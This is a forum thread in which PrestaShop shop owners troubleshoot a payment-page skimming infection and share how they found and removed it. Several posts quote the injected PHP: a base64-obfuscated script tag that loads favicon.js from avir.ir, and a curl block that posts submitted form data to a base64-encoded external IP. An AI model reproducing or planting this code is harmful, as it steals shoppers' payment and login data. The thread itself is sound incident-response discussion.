Joseph Joestar Posted March 22, 2021 Share Posted March 22, 2021 (edited) Hello In the code source of the order pages of my Prestashop 1.6 website, I found a script tag who is calling a malicious script <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> <!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]--> <!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]--> <!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]--> <!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]--> <html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman ...... This script changes the DOM and add an undesirable payment form after the PAYEMENT HOOK (I hid this form with CSS to prevent my customer to see it and use it. Is anyone having this same issue ? The problem seems pretty complex after 2 days of investigation, searching through all my files and all my DB without finding something interesting. Edited March 22, 2021 by Joseph Joestar (see edit history) Link to comment Share on other sites More sharing options...
Indy80 Posted March 26, 2021 Share Posted March 26, 2021 Yep it happened to me as well few days ago on prestashop 1.6. Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file if you find something like this and remove it : $html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4='); or at the end try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {} It's an injection but I still don't know where it came from (prestashop core breach ? module?)... it's really bad anyway Link to comment Share on other sites More sharing options...
Joseph Joestar Posted March 26, 2021 Author Share Posted March 26, 2021 Some solutions are there. Check out (in french) Link to comment Share on other sites More sharing options...
YanK1973 Posted April 13, 2021 Share Posted April 13, 2021 (edited) On 3/26/2021 at 4:47 PM, Indy80 said: Yep it happened to me as well few days ago on prestashop 1.6. Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file if you find something like this and remove it : $html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4='); or at the end try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {} It's an injection but I still don't know where it came from (prestashop core breach ? module?)... it's really bad anyway I found and removed those lines exactly where you said. Where can i check and clean rest of website? It seems i have more as i see in tests here https://sitecheck.sucuri.net and here https://scanner.pcrisk.com and they all are related to "Detected reference to malicious blacklisted domain www.avir.ir" I also found infection in AdminLoginController.ph as mentioned here , should i delete it? $ch = curl_init(base64_decode('aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9zdGF0eXN0aWNzLnBocA==')); EDIT: My hosting just informed me that the cartabandonmentpro was the reason, i had it installed but never enabled, now deleted of course. Edited April 13, 2021 by YanK1973 (see edit history) Link to comment Share on other sites More sharing options...
demontage Posted May 4, 2021 Share Posted May 4, 2021 Hello, I have the same problem with this favicon.js script. I removed all lines of code from those files mentioned here and even more (I searched for those keywords in all files in the shop). Unfortunately the fake payment form still exist and this also: <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> 😒 Anyone have a clue how to find it? Link to comment Share on other sites More sharing options...
Prestachamps Posted May 4, 2021 Share Posted May 4, 2021 Hi, have you checked if the script was somehow added from the database? also try disabling override ans disabling non prestashop modules, as there is a chance that the code is being added from some modules if it's not the database. Also, could you send me the URL of your shop in PM to me so I can check, maybe I can give you some clue where to search it. Kind regards, Leo Link to comment Share on other sites More sharing options...
demontage Posted May 4, 2021 Share Posted May 4, 2021 (edited) Hi, I don't how to check if it's from DB. I disable overrides and non-presta modules and I scanned all the files. Thank YOU! 🙏 Edited May 4, 2021 by demontage (see edit history) Link to comment Share on other sites More sharing options...
Prestachamps Posted May 4, 2021 Share Posted May 4, 2021 Hi, as I see, the script is being added into your footer.tpl, please check your theme's footer.tpl. Kind regards, Leo Link to comment Share on other sites More sharing options...
demontage Posted May 4, 2021 Share Posted May 4, 2021 32 minutes ago, Prestachamps said: Hi, as I see, the script is being added into your footer.tpl, please check your theme's footer.tpl. Kind regards, Leo The script is added dynamically by some other script probably, there is nothing in the footer.tpl. That was the first place I looked at Link to comment Share on other sites More sharing options...
Prestachamps Posted May 6, 2021 Share Posted May 6, 2021 Hi, to check if it's from DB, then export from your cPanel a Database dump, and open the dump in a txt editor, and search for "favicon.js" or for "avir.ir" Kind regards, Leo Link to comment Share on other sites More sharing options...
SirBob Posted May 11, 2021 Share Posted May 11, 2021 I have exactly the same issue on PS 1.6.1.23 version. I've cleaned the files mentioned in this thread but the offending JS code still appears. I uploaded clean files from the same version of PS. Still the problem exists. <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> definitely seems dynamically created / loaded as it does not appear in the themes header or footer tpl files. I've also looked in other tpl files just in case but no luck. Has anyone had success in removing the offending code - and its source to prevent re-infection, if so how? Please share as it would be really helpful to me - and no doubt others as this seems to be an exploit being run against PS in particular. I haven't come across similar threads or articles in relation to other e-commerce software. A scan against a backup of the db files did not reveal any reference to "avir" or "avir.ir" or the base64_encoded string. I am desperate for a solution if anyone has further ideas / insights. Many thanks! Link to comment Share on other sites More sharing options...
SirBob Posted May 11, 2021 Share Posted May 11, 2021 Update - I think I may have won this round - so perhaps what follows might help someone else facing a similar issue: I took the full script tag ==> <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> and base64_encoded it which revealed this => PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4= I scanned all files on the server for that string and found one further file which seemed to contain the offensive code in /controllers/front/ParentOrderController.php Replacing that file with a clean copy seemed to have done the trick. Hope this helps someone else... Cheers Link to comment Share on other sites More sharing options...
geigerherbert Posted June 22, 2022 Share Posted June 22, 2022 thank you for this very helpful information. I think we have to fix the security gap in the code not only to monitor the changes. anybody found the way in, where the malware came in? So we could shut this hole down? thank you Herb Link to comment Share on other sites More sharing options...
gmanPrestashop Posted July 1, 2022 Share Posted July 1, 2022 On 6/22/2022 at 9:40 PM, geigerherbert said: thank you for this very helpful information. I think we have to fix the security gap in the code not only to monitor the changes. anybody found the way in, where the malware came in? So we could shut this hole down? thank you Herb Hello, do you have any new information on this? Please let me know if so. Thank you! Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now